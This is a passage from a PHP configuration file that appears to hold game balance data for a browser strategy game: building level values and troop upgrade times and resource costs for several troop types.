'resources' => array( '1' => 3245, '2' => 4055, '3' => 2840, '4' => 810 )



'value' => 45700, 'time_consume' => 35470, 'cp' => 22, 'people_inc' => 2,

'resources' => array( '1' => 4155, '2' => 5190, '3' => 3635, '4' => 1040 )



'value' => 55100, 'time_consume' => 41450, 'cp' => 27, 'people_inc' => 2,

'resources' => array( '1' => 5315, '2' => 6645, '3' => 4650, '4' => 1330 )



'value' => 66400, 'time_consume' => 48380, 'cp' => 32, 'people_inc' => 2,

'resources' => array( '1' => 6805, '2' => 8505, '3' => 5955, '4' => 1700 )



'value' => 80000, 'time_consume' => 56420, 'cp' => 38, 'people_inc' => 2,

'resources' => array( '1' => 8710, '2' => 10890, '3' => 7620, '4' => 2180 )




'12'=> array (

'troop_upgrades'=> array (

'1'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 940, '2' => 800, '3' => 1250, '4' => 370)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1635, '2' => 1395, '3' => 2175, '4' => 645)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2265, '2' => 1925, '3' => 3010, '4' => 890)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2850, '2' => 2425, '3' => 3790, '4' => 1120)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3405, '2' => 2900, '3' => 4530, '4' => 1340)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3940, '2' => 3355, '3' => 5240, '4' => 1550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4460, '2' => 3795, '3' => 5930, '4' => 1755)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4960, '2' => 4220, '3' => 6600, '4' => 1955)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5450, '2' => 4640, '3' => 7250, '4' => 2145)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5930, '2' => 5050, '3' => 7885, '4' => 2335)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6400, '2' => 5450, '3' => 8510, '4' => 2520)),

array ('time_consume' => 89280, 'resources' => array( '1' => 6860, '2' => 5840, '3' => 9125, '4' => 2700)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7315, '2' => 6225, '3' => 9730, '4' => 2880)),

array ('time_consume' => 103680, 'resources' => array( '1' => 7765, '2' => 6605, '3' => 10325, '4' => 3055)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8205, '2' => 6980, '3' => 10910, '4' => 3230)),

array ('time_consume' => 118080, 'resources' => array( '1' => 8640, '2' => 7350, '3' => 11485, '4' => 3400)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9065, '2' => 7715, '3' => 12060, '4' => 3570)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9490, '2' => 8080, '3' => 12620, '4' => 3735)),

array ('time_consume' => 139680, 'resources' => array( '1' => 9910, '2' => 8435, '3' => 13180, '4' => 3900)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10325, '2' => 8790, '3' => 13730, '4' => 4065)),


'2'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 800, '2' => 1010, '3' => 1320, '4' => 650)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1395, '2' => 1760, '3' => 2300, '4' => 1130)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1925, '2' => 2430, '3' => 3180, '4' => 1565)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2425, '2' => 3060, '3' => 4000, '4' => 1970)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2900, '2' => 3660, '3' => 4785, '4' => 2355)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3355, '2' => 4235, '3' => 5535, '4' => 2725)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3795, '2' => 4790, '3' => 6260, '4' => 3085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4220, '2' => 5330, '3' => 6965, '4' => 3430)),

array ('time_consume' => 67680, 'resources' => array( '1' => 4640, '2' => 5860, '3' => 7655, '4' => 3770)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5050, '2' => 6375, '3' => 8330, '4' => 4100)),

array ('time_consume' => 82080, 'resources' => array( '1' => 5450, '2' => 6880, '3' => 8990, '4' => 4425)),

array ('time_consume' => 89280, 'resources' => array( '1' => 5840, '2' => 7375, '3' => 9635, '4' => 4745)),

array ('time_consume' => 96480, 'resources' => array( '1' => 6225, '2' => 7860, '3' => 10275, '4' => 5060)),

array ('time_consume' => 103680, 'resources' => array( '1' => 6605, '2' => 8340, '3' => 10900, '4' => 5370)),

array ('time_consume' => 110880, 'resources' => array( '1' => 6980, '2' => 8815, '3' => 11520, '4' => 5675)),

array ('time_consume' => 118080, 'resources' => array( '1' => 7350, '2' => 9280, '3' => 12130, '4' => 5975)),

array ('time_consume' => 125280, 'resources' => array( '1' => 7715, '2' => 9745, '3' => 12735, '4' => 6270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 8080, '2' => 10200, '3' => 13330, '4' => 6565)),

array ('time_consume' => 139680, 'resources' => array( '1' => 8435, '2' => 10650, '3' => 13920, '4' => 6855)),

array ('time_consume' => 146880, 'resources' => array( '1' => 8790, '2' => 11095, '3' => 14500, '4' => 7140)),


'3'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1150, '2' => 1220, '3' => 1670, '4' => 720)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2000, '2' => 2125, '3' => 2910, '4' => 1255)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2770, '2' => 2940, '3' => 4020, '4' => 1735)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3485, '2' => 3700, '3' => 5060, '4' => 2185)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4165, '2' => 4420, '3' => 6050, '4' => 2610)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4820, '2' => 5115, '3' => 7000, '4' => 3020)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5455, '2' => 5785, '3' => 7920, '4' => 3415)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6070, '2' => 6440, '3' => 8815, '4' => 3800)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6670, '2' => 7075, '3' => 9685, '4' => 4175)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7255, '2' => 7700, '3' => 10535, '4' => 4545)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7830, '2' => 8310, '3' => 11370, '4' => 4905)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8395, '2' => 8905, '3' => 12190, '4' => 5255)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8950, '2' => 9495, '3' => 13000, '4' => 5605)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9495, '2' => 10075, '3' => 13790, '4' => 5945)),

array ('time_consume' => 110880, 'resources' => array( '1' => 10035, '2' => 10645, '3' => 14575, '4' => 6285)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10570, '2' => 11210, '3' => 15345, '4' => 6615)),

array ('time_consume' => 125280, 'resources' => array( '1' => 11095, '2' => 11770, '3' => 16110, '4' => 6945)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11610, '2' => 12320, '3' => 16865, '4' => 7270)),

array ('time_consume' => 139680, 'resources' => array( '1' => 12125, '2' => 12865, '3' => 17610, '4' => 7590)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12635, '2' => 13400, '3' => 18345, '4' => 7910)),


'4'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 540, '2' => 610, '3' => 170, '4' => 220)),

array ('time_consume' => 17280, 'resources' => array( '1' => 940, '2' => 1060, '3' => 295, '4' => 385)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1300, '2' => 1470, '3' => 410, '4' => 530)),

array ('time_consume' => 31680, 'resources' => array( '1' => 1635, '2' => 1850, '3' => 515, '4' => 665)),

array ('time_consume' => 38880, 'resources' => array( '1' => 1955, '2' => 2210, '3' => 615, '4' => 795)),

array ('time_consume' => 46080, 'resources' => array( '1' => 2265, '2' => 2560, '3' => 715, '4' => 920)),

array ('time_consume' => 53280, 'resources' => array( '1' => 2560, '2' => 2895, '3' => 805, '4' => 1045)),

array ('time_consume' => 60480, 'resources' => array( '1' => 2850, '2' => 3220, '3' => 895, '4' => 1160)),

array ('time_consume' => 67680, 'resources' => array( '1' => 3130, '2' => 3540, '3' => 985, '4' => 1275)),

array ('time_consume' => 74880, 'resources' => array( '1' => 3405, '2' => 3850, '3' => 1075, '4' => 1390)),

array ('time_consume' => 82080, 'resources' => array( '1' => 3675, '2' => 4155, '3' => 1160, '4' => 1500)),

array ('time_consume' => 89280, 'resources' => array( '1' => 3940, '2' => 4455, '3' => 1240, '4' => 1605)),

array ('time_consume' => 96480, 'resources' => array( '1' => 4205, '2' => 4750, '3' => 1325, '4' => 1710)),

array ('time_consume' => 103680, 'resources' => array( '1' => 4460, '2' => 5040, '3' => 1405, '4' => 1815)),

array ('time_consume' => 110880, 'resources' => array( '1' => 4715, '2' => 5325, '3' => 1485, '4' => 1920)),

array ('time_consume' => 118080, 'resources' => array( '1' => 4960, '2' => 5605, '3' => 1560, '4' => 2020)),

array ('time_consume' => 125280, 'resources' => array( '1' => 5210, '2' => 5885, '3' => 1640, '4' => 2120)),

array ('time_consume' => 132480, 'resources' => array( '1' => 5455, '2' => 6160, '3' => 1715, '4' => 2220)),

array ('time_consume' => 139680, 'resources' => array( '1' => 5695, '2' => 6430, '3' => 1790, '4' => 2320)),

array ('time_consume' => 146880, 'resources' => array( '1' => 5930, '2' => 6700, '3' => 1870, '4' => 2415)),


'5'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1315, '2' => 1060, '3' => 815, '4' => 285)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2290, '2' => 1845, '3' => 1415, '4' => 500)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3170, '2' => 2555, '3' => 1960, '4' => 690)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3990, '2' => 3215, '3' => 2465, '4' => 870)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4770, '2' => 3840, '3' => 2945, '4' => 1040)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5520, '2' => 4445, '3' => 3410, '4' => 1200)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6245, '2' => 5030, '3' => 3860, '4' => 1360)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6950, '2' => 5595, '3' => 4295, '4' => 1515)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7635, '2' => 6150, '3' => 4715, '4' => 1665)),

array ('time_consume' => 74880, 'resources' => array( '1' => 8310, '2' => 6690, '3' => 5130, '4' => 1810)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8965, '2' => 7220, '3' => 5540, '4' => 1950)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9610, '2' => 7740, '3' => 5940, '4' => 2095)),

array ('time_consume' => 96480, 'resources' => array( '1' => 10250, '2' => 8250, '3' => 6330, '4' => 2230)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10875, '2' => 8755, '3' => 6715, '4' => 2365)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11490, '2' => 9250, '3' => 7100, '4' => 2500)),

array ('time_consume' => 118080, 'resources' => array( '1' => 12100, '2' => 9740, '3' => 7475, '4' => 2635)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12700, '2' => 10225, '3' => 7845, '4' => 2765)),

array ('time_consume' => 132480, 'resources' => array( '1' => 13295, '2' => 10705, '3' => 8215, '4' => 2895)),

array ('time_consume' => 139680, 'resources' => array( '1' => 13885, '2' => 11175, '3' => 8575, '4' => 3025)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14465, '2' => 11645, '3' => 8935, '4' => 3150)),


'6'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 990, '2' => 1145, '3' => 1450, '4' => 355)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1720, '2' => 1995, '3' => 2525, '4' => 620)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2380, '2' => 2755, '3' => 3490, '4' => 855)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2995, '2' => 3470, '3' => 4395, '4' => 1075)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3580, '2' => 4150, '3' => 5255, '4' => 1285)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4140, '2' => 4800, '3' => 6080, '4' => 1490)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4685, '2' => 5430, '3' => 6880, '4' => 1685)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5210, '2' => 6045, '3' => 7655, '4' => 1875)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5725, '2' => 6640, '3' => 8410, '4' => 2060)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6230, '2' => 7225, '3' => 9150, '4' => 2240)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6725, '2' => 7795, '3' => 9875, '4' => 2415)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7210, '2' => 8360, '3' => 10585, '4' => 2590)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7685, '2' => 8910, '3' => 11285, '4' => 2765)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8155, '2' => 9455, '3' => 11975, '4' => 2930)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8620, '2' => 9995, '3' => 12655, '4' => 3100)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9075, '2' => 10520, '3' => 13325, '4' => 3260)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9525, '2' => 11045, '3' => 13985, '4' => 3425)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9970, '2' => 11560, '3' => 14640, '4' => 3585)),

array ('time_consume' => 139680, 'resources' => array( '1' => 10410, '2' => 12075, '3' => 15290, '4' => 3745)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10850, '2' => 12580, '3' => 15930, '4' => 3900)),


'7'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 2135, '2' => 875, '3' => 1235, '4' => 215)),

array ('time_consume' => 17280, 'resources' => array( '1' => 3715, '2' => 1520, '3' => 2145, '4' => 375)),

array ('time_consume' => 24480, 'resources' => array( '1' => 5140, '2' => 2105, '3' => 2970, '4' => 520)),

array ('time_consume' => 31680, 'resources' => array( '1' => 6465, '2' => 2645, '3' => 3740, '4' => 655)),

array ('time_consume' => 38880, 'resources' => array( '1' => 7730, '2' => 3165, '3' => 4470, '4' => 785)),

array ('time_consume' => 46080, 'resources' => array( '1' => 8945, '2' => 3660, '3' => 5170, '4' => 910)),

array ('time_consume' => 53280, 'resources' => array( '1' => 10120, '2' => 4140, '3' => 5850, '4' => 1030)),

array ('time_consume' => 60480, 'resources' => array( '1' => 11260, '2' => 4610, '3' => 6510, '4' => 1145)),

array ('time_consume' => 67680, 'resources' => array( '1' => 12370, '2' => 5065, '3' => 7155, '4' => 1255)),

array ('time_consume' => 74880, 'resources' => array( '1' => 13460, '2' => 5510, '3' => 7780, '4' => 1365)),

array ('time_consume' => 82080, 'resources' => array( '1' => 14525, '2' => 5945, '3' => 8400, '4' => 1475)),

array ('time_consume' => 89280, 'resources' => array( '1' => 15575, '2' => 6375, '3' => 9005, '4' => 1580)),

array ('time_consume' => 96480, 'resources' => array( '1' => 16605, '2' => 6795, '3' => 9600, '4' => 1685)),

array ('time_consume' => 103680, 'resources' => array( '1' => 17620, '2' => 7210, '3' => 10185, '4' => 1790)),

array ('time_consume' => 110880, 'resources' => array( '1' => 18620, '2' => 7620, '3' => 10765, '4' => 1890)),

array ('time_consume' => 118080, 'resources' => array( '1' => 19605, '2' => 8025, '3' => 11335, '4' => 1990)),

array ('time_consume' => 125280, 'resources' => array( '1' => 20580, '2' => 8425, '3' => 11895, '4' => 2090)),

array ('time_consume' => 132480, 'resources' => array( '1' => 21540, '2' => 8820, '3' => 12455, '4' => 2190)),

array ('time_consume' => 139680, 'resources' => array( '1' => 22495, '2' => 9210, '3' => 13005, '4' => 2285)),

array ('time_consume' => 146880, 'resources' => array( '1' => 23435, '2' => 9595, '3' => 13550, '4' => 2380)),


'8'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1125, '2' => 1590, '3' => 735, '4' => 130)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1960, '2' => 2770, '3' => 1275, '4' => 230)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2710, '2' => 3835, '3' => 1765, '4' => 315)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3410, '2' => 4825, '3' => 2225, '4' => 400)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4075, '2' => 5770, '3' => 2660, '4' => 475)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4715, '2' => 6675, '3' => 3075, '4' => 550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5335, '2' => 7550, '3' => 3480, '4' => 625)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5940, '2' => 8400, '3' => 3870, '4' => 695)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6525, '2' => 9230, '3' => 4255, '4' => 765)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7100, '2' => 10045, '3' => 4625, '4' => 830)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7660, '2' => 10840, '3' => 4995, '4' => 895)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8215, '2' => 11620, '3' => 5355, '4' => 960)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8755, '2' => 12390, '3' => 5710, '4' => 1025)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9290, '2' => 13145, '3' => 6055, '4' => 1085)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9820, '2' => 13890, '3' => 6400, '4' => 1150)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10340, '2' => 14625, '3' => 6740, '4' => 1210)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10850, '2' => 15355, '3' => 7075, '4' => 1270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11360, '2' => 16070, '3' => 7405, '4' => 1330)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11860, '2' => 16780, '3' => 7730, '4' => 1390)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12360, '2' => 17485, '3' => 8055, '4' => 1445)),


'11'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 765, '2' => 625, '3' => 480, '4' => 440)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1330, '2' => 1090, '3' => 835, '4' => 765)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1840, '2' => 1505, '3' => 1155, '4' => 1060)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2320, '2' => 1895, '3' => 1455, '4' => 1335)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2770, '2' => 2265, '3' => 1740, '4' => 1595)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3210, '2' => 2620, '3' => 2015, '4' => 1845)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3630, '2' => 2965, '3' => 2275, '4' => 2085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4040, '2' => 3300, '3' => 2535, '4' => 2320)),

array ('time_consume' => 67680, 'resources' => array( '1' => 4435, '2' => 3625, '3' => 2785, '4' => 2550)),

array ('time_consume' => 74880, 'resources' => array( '1' => 4825, '2' => 3945, '3' => 3030, '4' => 2775)),

array ('time_consume' => 82080, 'resources' => array( '1' => 5210, '2' => 4255, '3' => 3270, '4' => 2995)),

array ('time_consume' => 89280, 'resources' => array( '1' => 5585, '2' => 4565, '3' => 3505, '4' => 3210)),

array ('time_consume' => 96480, 'resources' => array( '1' => 5955, '2' => 4865, '3' => 3735, '4' => 3425)),

array ('time_consume' => 103680, 'resources' => array( '1' => 6320, '2' => 5160, '3' => 3965, '4' => 3635)),

array ('time_consume' => 110880, 'resources' => array( '1' => 6675, '2' => 5455, '3' => 4190, '4' => 3840)),

array ('time_consume' => 118080, 'resources' => array( '1' => 7030, '2' => 5745, '3' => 4410, '4' => 4045)),

array ('time_consume' => 125280, 'resources' => array( '1' => 7380, '2' => 6030, '3' => 4630, '4' => 4245)),

array ('time_consume' => 132480, 'resources' => array( '1' => 7725, '2' => 6310, '3' => 4845, '4' => 4445)),

array ('time_consume' => 139680, 'resources' => array( '1' => 8065, '2' => 6590, '3' => 5060, '4' => 4640)),

array ('time_consume' => 146880, 'resources' => array( '1' => 8405, '2' => 6865, '3' => 5275, '4' => 4835)),


'12'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1115, '2' => 590, '3' => 795, '4' => 440)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1940, '2' => 1025, '3' => 1385, '4' => 765)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2685, '2' => 1420, '3' => 1915, '4' => 1060)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3380, '2' => 1790, '3' => 2410, '4' => 1335)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4040, '2' => 2140, '3' => 2880, '4' => 1595)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4675, '2' => 2475, '3' => 3335, '4' => 1845)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5290, '2' => 2800, '3' => 3770, '4' => 2085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5885, '2' => 3115, '3' => 4195, '4' => 2320)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6465, '2' => 3420, '3' => 4610, '4' => 2550)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7035, '2' => 3725, '3' => 5015, '4' => 2775)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7595, '2' => 4020, '3' => 5415, '4' => 2995)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8140, '2' => 4305, '3' => 5805, '4' => 3210)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8680, '2' => 4590, '3' => 6190, '4' => 3425)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9210, '2' => 4875, '3' => 6565, '4' => 3635)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9730, '2' => 5150, '3' => 6940, '4' => 3840)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10245, '2' => 5420, '3' => 7305, '4' => 4045)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10755, '2' => 5690, '3' => 7670, '4' => 4245)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11260, '2' => 5960, '3' => 8030, '4' => 4445)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11755, '2' => 6220, '3' => 8380, '4' => 4640)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12250, '2' => 6480, '3' => 8735, '4' => 4835)),


'13'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1010, '2' => 940, '3' => 1390, '4' => 650)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1760, '2' => 1635, '3' => 2420, '4' => 1130)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2430, '2' => 2265, '3' => 3345, '4' => 1565)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3060, '2' => 2850, '3' => 4215, '4' => 1970)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3660, '2' => 3405, '3' => 5035, '4' => 2355)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4235, '2' => 3940, '3' => 5830, '4' => 2725)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4790, '2' => 4460, '3' => 6595, '4' => 3085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5330, '2' => 4960, '3' => 7335, '4' => 3430)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5860, '2' => 5450, '3' => 8060, '4' => 3770)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6375, '2' => 5930, '3' => 8770, '4' => 4100)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6880, '2' => 6400, '3' => 9465, '4' => 4425)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7375, '2' => 6860, '3' => 10150, '4' => 4745)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7860, '2' => 7315, '3' => 10820, '4' => 5060)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8340, '2' => 7765, '3' => 11480, '4' => 5370)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8815, '2' => 8205, '3' => 12130, '4' => 5675)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9280, '2' => 8640, '3' => 12775, '4' => 5975)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9745, '2' => 9065, '3' => 13410, '4' => 6270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 10200, '2' => 9490, '3' => 14035, '4' => 6565)),

array ('time_consume' => 139680, 'resources' => array( '1' => 10650, '2' => 9910, '3' => 14655, '4' => 6855)),

array ('time_consume' => 146880, 'resources' => array( '1' => 11095, '2' => 10325, '3' => 15270, '4' => 7140)),


'14'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1220, '2' => 800, '3' => 550, '4' => 510)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2125, '2' => 1395, '3' => 960, '4' => 890)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2940, '2' => 1925, '3' => 1325, '4' => 1230)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3700, '2' => 2425, '3' => 1665, '4' => 1545)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4420, '2' => 2900, '3' => 1995, '4' => 1850)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5115, '2' => 3355, '3' => 2305, '4' => 2140)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5785, '2' => 3795, '3' => 2610, '4' => 2420)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6440, '2' => 4220, '3' => 2905, '4' => 2690)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7075, '2' => 4640, '3' => 3190, '4' => 2960)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7700, '2' => 5050, '3' => 3470, '4' => 3220)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8310, '2' => 5450, '3' => 3745, '4' => 3475)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8905, '2' => 5840, '3' => 4015, '4' => 3725)),

array ('time_consume' => 96480, 'resources' => array( '1' => 9495, '2' => 6225, '3' => 4280, '4' => 3970)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10075, '2' => 6605, '3' => 4540, '4' => 4210)),

array ('time_consume' => 110880, 'resources' => array( '1' => 10645, '2' => 6980, '3' => 4800, '4' => 4450)),

array ('time_consume' => 118080, 'resources' => array( '1' => 11210, '2' => 7350, '3' => 5055, '4' => 4685)),

array ('time_consume' => 125280, 'resources' => array( '1' => 11770, '2' => 7715, '3' => 5305, '4' => 4920)),

array ('time_consume' => 132480, 'resources' => array( '1' => 12320, '2' => 8080, '3' => 5555, '4' => 5150)),

array ('time_consume' => 139680, 'resources' => array( '1' => 12865, '2' => 8435, '3' => 5800, '4' => 5375)),

array ('time_consume' => 146880, 'resources' => array( '1' => 13400, '2' => 8790, '3' => 6040, '4' => 5605)),


'15'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1345, '2' => 995, '3' => 1115, '4' => 345)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2340, '2' => 1730, '3' => 1940, '4' => 595)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3240, '2' => 2395, '3' => 2685, '4' => 825)),

array ('time_consume' => 31680, 'resources' => array( '1' => 4075, '2' => 3015, '3' => 3380, '4' => 1040)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4875, '2' => 3605, '3' => 4040, '4' => 1240)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5640, '2' => 4170, '3' => 4675, '4' => 1435)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6380, '2' => 4720, '3' => 5290, '4' => 1625)),

array ('time_consume' => 60480, 'resources' => array( '1' => 7100, '2' => 5250, '3' => 5885, '4' => 1810)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7800, '2' => 5770, '3' => 6465, '4' => 1985)),

array ('time_consume' => 74880, 'resources' => array( '1' => 8485, '2' => 6280, '3' => 7035, '4' => 2160)),

array ('time_consume' => 82080, 'resources' => array( '1' => 9160, '2' => 6775, '3' => 7595, '4' => 2330)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9820, '2' => 7265, '3' => 8140, '4' => 2500)),

array ('time_consume' => 96480, 'resources' => array( '1' => 10470, '2' => 7745, '3' => 8680, '4' => 2665)),

array ('time_consume' => 103680, 'resources' => array( '1' => 11110, '2' => 8215, '3' => 9210, '4' => 2830)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11740, '2' => 8685, '3' => 9730, '4' => 2990)),

array ('time_consume' => 118080, 'resources' => array( '1' => 12360, '2' => 9145, '3' => 10245, '4' => 3145)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12975, '2' => 9600, '3' => 10755, '4' => 3305)),

array ('time_consume' => 132480, 'resources' => array( '1' => 13580, '2' => 10045, '3' => 11260, '4' => 3460)),

array ('time_consume' => 139680, 'resources' => array( '1' => 14180, '2' => 10490, '3' => 11755, '4' => 3610)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14775, '2' => 10930, '3' => 12250, '4' => 3765)),


'16'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1085, '2' => 1235, '3' => 1185, '4' => 240)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1885, '2' => 2150, '3' => 2065, '4' => 420)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2610, '2' => 2975, '3' => 2860, '4' => 580)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3285, '2' => 3745, '3' => 3595, '4' => 730)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3925, '2' => 4475, '3' => 4300, '4' => 870)),

